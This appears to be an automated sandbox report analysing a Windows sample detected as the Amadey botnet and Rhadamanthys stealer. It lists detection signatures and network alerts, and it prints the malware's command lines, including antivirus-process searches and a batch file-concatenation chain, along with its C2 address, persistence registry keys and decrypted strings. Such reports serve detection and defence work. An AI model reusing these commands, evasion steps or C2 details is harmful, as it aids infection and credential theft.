Edit tour

Windows Analysis Report
J2NWKU2oJi.exe

Overview

General Information

Sample name:	J2NWKU2oJi.exe renamed because original name is a hash value
Original sample name:	9e64b65535e29ec152642d8bdcb22974.exe
Analysis ID:	1425696
MD5:	9e64b65535e29ec152642d8bdcb22974
SHA1:	5431aa7526ba193c0a92afffe2537bc54f51a0ba
SHA256:	6586cb8766c14a87330bf6c79a7cbd7cbff3ca9da63574a9c348645117d08f14
Tags:	32exetrojan
Infos:

Detection

Amadey, RHADAMANTHYS

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Snort IDS alert for network traffic

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected RHADAMANTHYS Stealer

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Drops PE files with a suspicious file extension

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect virtual machines (STR)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Execution of Suspicious File Type Extension

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara detected Keylogger Generic

Classification

Process Tree

System is w10x64

J2NWKU2oJi.exe (PID: 6340 cmdline: "C:\Users\user\Desktop\J2NWKU2oJi.exe" MD5: 9E64B65535E29EC152642D8BDCB22974)

cmd.exe (PID: 6452 cmdline: "C:\Windows\system32\cmd.exe" /c move Scenes Scenes.bat && Scenes.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6700 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 6724 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 6840 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 6868 cmdline: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 6992 cmdline: cmd /c md 331463 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 6976 cmdline: findstr /V "AdditionUnitKoreanLn" Remembered MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7028 cmdline: cmd /c copy /b Pitch + Twelve + Conditions + Venture + Pushing 331463\Q MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Pleasure.pif (PID: 2720 cmdline: 331463\Pleasure.pif 331463\Q MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)

dialer.exe (PID: 796 cmdline: "C:\Windows\system32\dialer.exe" MD5: E4BD77FB64DDE78F1A95ECE09F6A9B85)

OpenWith.exe (PID: 6736 cmdline: "C:\Windows\system32\openwith.exe" MD5: E4A834784FA08C17D47A1E72429C5109)

Yuem.exe (PID: 6840 cmdline: "C:\Users\user\AppData\Local\Microsoft\Yuem.exe" MD5: 5A14BA286D692A6D65DBCF7340EA1C8C)

Dctooux.exe (PID: 1456 cmdline: "C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe" MD5: 5A14BA286D692A6D65DBCF7340EA1C8C)

WerFault.exe (PID: 3052 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 984 MD5: C31336C1EFC2CCB44B4326EA793040F2)

PING.EXE (PID: 5676 cmdline: ping -n 5 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)

Dctooux.exe (PID: 6448 cmdline: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe MD5: 5A14BA286D692A6D65DBCF7340EA1C8C)

Dctooux.exe (PID: 6072 cmdline: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe MD5: 5A14BA286D692A6D65DBCF7340EA1C8C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Rhadamanthys	According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.	Sandworm	https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023 https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88 https://github.com/echocti/ECHO-Reports/blob/main/Malware%20Analysis%20Report/Rhdamanthys/Rhadamanthys-EN.pdf https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf	https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

Threatname: Amadey

{"C2 url": "91.202.233.180/g88sks2SaM/index.php", "Version": "4.19"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Yuem.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000019.00000000.2745389510.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000010.00000003.2230681896.0000000002E95000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000010.00000003.2204938380.0000000005080000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000014.00000003.2520663901.000001BD779C0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000014.00000003.2518352508.000001BD77953000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000010.00000002.2280661154.0000000004720000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000016.00000000.2522186450.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000019.00000002.2755905464.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000014.00000003.2518526497.000001BD7793B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000010.00000003.2201808869.0000000002C50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000010.00000003.2204492653.0000000004E60000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000014.00000003.2522953680.000001BD77953000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000018.00000000.2552580820.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000017.00000000.2538475835.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
Process Memory Space: dialer.exe PID: 796	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: OpenWith.exe PID: 6736	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 17 entries

Unpacked PEs

Source	Rule	Description	Author
20.3.OpenWith.exe.1bd77981c18.19.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
22.2.Yuem.exe.ce0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
22.0.Yuem.exe.ce0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
24.2.Dctooux.exe.a50000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
20.3.OpenWith.exe.1bd779c0438.24.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
23.2.Dctooux.exe.a50000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
24.0.Dctooux.exe.a50000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
25.0.Dctooux.exe.a50000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
20.3.OpenWith.exe.1bd779c0438.21.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
23.0.Dctooux.exe.a50000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
25.2.Dctooux.exe.a50000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
20.3.OpenWith.exe.1bd779627f8.20.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
16.3.dialer.exe.5080000.7.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
16.3.dialer.exe.4e60000.6.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
16.3.dialer.exe.5080000.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
16.3.dialer.exe.4e60000.6.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
16.3.dialer.exe.4e60000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 12 entries

Sigma Signatures

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: 331463\Pleasure.pif 331463\Q, CommandLine: 331463\Pleasure.pif 331463\Q, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif, NewProcessName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif, OriginalFileName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c move Scenes Scenes.bat && Scenes.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6452, ParentProcessName: cmd.exe, ProcessCommandLine: 331463\Pleasure.pif 331463\Q, ProcessId: 2720, ProcessName: Pleasure.pif

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c move Scenes Scenes.bat && Scenes.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6452, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 6868, ProcessName: findstr.exe

Snort Signatures

ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert - Source IP: 94.156.10.37 - Destination IP: 192.168.2.4

Timestamp:	04/14/24-08:45:10.367818
SID:	2854802
Source Port:	2036
Destination Port:	49736
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.4 - Destination IP: 91.202.233.180

Timestamp:	04/14/24-08:45:41.973536
SID:	2856147
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 91.202.233.180

Timestamp:	04/14/24-08:45:42.049159
SID:	2044597
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert - Source IP: 94.156.10.37 - Destination IP: 192.168.2.4

Timestamp:	04/14/24-08:45:35.661847
SID:	2854802
Source Port:	2036
Destination Port:	49739
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 91.202.233.180

Timestamp:	04/14/24-08:45:58.278686
SID:	2044597
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 91.202.233.180

Timestamp:	04/14/24-08:46:00.089663
SID:	2044597
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert - Source IP: 94.156.10.37 - Destination IP: 192.168.2.4

Timestamp:	04/14/24-08:45:25.958978
SID:	2854802
Source Port:	2036
Destination Port:	49738
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 91.202.233.180

Timestamp:	04/14/24-08:46:03.336126
SID:	2044597
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 91.202.233.180

Timestamp:	04/14/24-08:45:52.931085
SID:	2044597
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 91.202.233.180

Timestamp:	04/14/24-08:45:48.355188
SID:	2044597
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 91.202.233.180

Timestamp:	04/14/24-08:45:55.955775
SID:	2044597
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 91.202.233.180

Timestamp:	04/14/24-08:45:46.714449
SID:	2044597
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 91.202.233.180

Timestamp:	04/14/24-08:45:43.758629
SID:	2044597
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 91.202.233.180

Timestamp:	04/14/24-08:45:51.301565
SID:	2044597
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 91.202.233.180

Timestamp:	04/14/24-08:46:05.015047
SID:	2044597
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Avira: detection malicious, Label: HEUR/AGEN.1319380
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Avira: detection malicious, Label: HEUR/AGEN.1319380

Found malware configuration

Source: 22.2.Yuem.exe.ce0000.0.unpack

Malware Configuration Extractor: Amadey {"C2 url": "91.202.233.180/g88sks2SaM/index.php", "Version": "4.19"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Virustotal: Detection: 52%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Virustotal: Detection: 52%	Perma Link

Multi AV Scanner detection for submitted file

Source: J2NWKU2oJi.exe	Virustotal: Detection: 20%			Perma Link
Source: J2NWKU2oJi.exe	ReversingLabs: Detection: 21%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: J2NWKU2oJi.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: 91.202.233.180
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: /g88sks2SaM/index.php
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: S-%lu-
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: ccbfb9d50e
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: Dctooux.exe
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: Startup
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: cmd /C RMDIR /s/q
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: rundll32
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: Programs
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: %USERPROFILE%
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: cred.dll\|clip.dll\|
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: http://
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: https://
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: /Plugins/
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: &unit=
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: shell32.dll
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: kernel32.dll
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: GetNativeSystemInfo
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: ProgramData\
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: AVAST Software
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: Kaspersky Lab
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: Panda Security
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: Doctor Web
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: 360TotalSecurity
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: Bitdefender
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: Norton
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: Sophos
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: Comodo
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: WinDefender
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: 0123456789
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: ------
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: ?scr=1
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: ComputerName
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: -unicode-
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: VideoID
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: DefaultSettings.XResolution
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: DefaultSettings.YResolution
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: ProductName
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: CurrentBuild
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: rundll32.exe
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: "taskkill /f /im "
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: " && timeout 1 && del
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: && Exit"
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: " && ren
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: Powershell.exe
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: -executionpolicy remotesigned -File "
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: shutdown -s -t 0
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: random
Source: 22.2.Yuem.exe.ce0000.0.unpack	String decryptor: 5sXe3T

Source: C:\Windows\System32\OpenWith.exe

Code function: 20_3_00007DF4B637FF7C CryptUnprotectData,

20_3_00007DF4B637FF7C

Source: J2NWKU2oJi.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: J2NWKU2oJi.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdb source: dialer.exe, 00000010.00000003.2203876549.0000000004F80000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2203713237.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: dialer.exe, 00000010.00000003.2204938380.0000000005080000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2204492653.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: dialer.exe, 00000010.00000003.2202969812.0000000005050000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2202662446.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: dialer.exe, 00000010.00000003.2203315691.0000000004E60000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2203489715.0000000005000000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: dialer.exe, 00000010.00000003.2202969812.0000000005050000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2202662446.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: dialer.exe, 00000010.00000003.2203315691.0000000004E60000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2203489715.0000000005000000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbTSw source: OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: dialer.exe, 00000010.00000003.2204938380.0000000005080000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2204492653.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: dialer.exe, 00000010.00000003.2203876549.0000000004F80000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2203713237.0000000004E60000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Code function: 0_2_00406873 FindFirstFileW,FindClose,	0_2_00406873
